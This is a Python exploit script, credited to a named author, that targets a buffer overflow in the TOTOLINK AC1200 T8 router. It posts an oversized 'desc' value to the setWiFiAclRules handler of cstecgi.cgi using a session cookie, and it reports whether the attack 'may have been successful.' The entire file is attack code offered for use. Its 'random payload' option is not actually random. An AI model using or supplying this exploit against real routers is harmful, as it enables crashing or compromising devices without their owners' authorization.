exploit_totolink.py

import requests
import sys
import time

if len(sys.argv) != 5:
    print("Example : exploit_totolink.py <target_url> <session_cookie> <payload_size> <random_payload (yes/no)>")
    sys.exit(1)

target_url = sys.argv[1]  # e.g., http://127.0.0.1/cgi-bin/cstecgi.cgi
session_cookie = {"Cookie": sys.argv[2]}  # e.g., SESSION_ID=2:1721039211:2
payload_size = int(sys.argv[3])  # Payload size
random_payload_option = sys.argv[4].lower() == 'yes'  # Use random payload if 'yes'

print("""
Developed by Vidura Ranathunga
====================================================================
[!] Exploiting TOTOLINK AC1200 T8 Buffer Overflow Vulnerability
""")

def generate_random_payload(size):
    return 'b' * size  # Basic payload; you could enhance this with randomness if needed

def exploit_totolink(url, session_cookie, payload_size, use_random):
    if use_random:
        payload_desc = generate_random_payload(payload_size)
    else:
        payload_desc = 'b' * payload_size

    data = {
        "topicurl": "setWiFiAclRules",
        "addEffect": "1",
        "mac": "111",
        "desc": payload_desc,
    }

    try:
        response = requests.post(url, cookies=session_cookie, json=data)
        print("Response Status Code:", response.status_code)
        print("Response Text:", response.text)
        
        if response.status_code == 200:
            print("Exploit may have been successful.")
        else:
            print("Exploit failed with status code:", response.status_code)
    
    except Exception as e:
        print("An error occurred:", e)

if __name__ == "__main__":
    print(f"""
    ============================================================
                      [!] TOTOLINK AC1200 T8 Exploit
    -----------------------------------------------------------
    [*] Target URL: {target_url}
    [*] Session Cookie: {session_cookie}
    [*] Payload Size: {payload_size}
    [*] Random Payload: {'Yes' if random_payload_option else 'No'}
    """)

    exploit_totolink(target_url, session_cookie, payload_size, random_payload_option)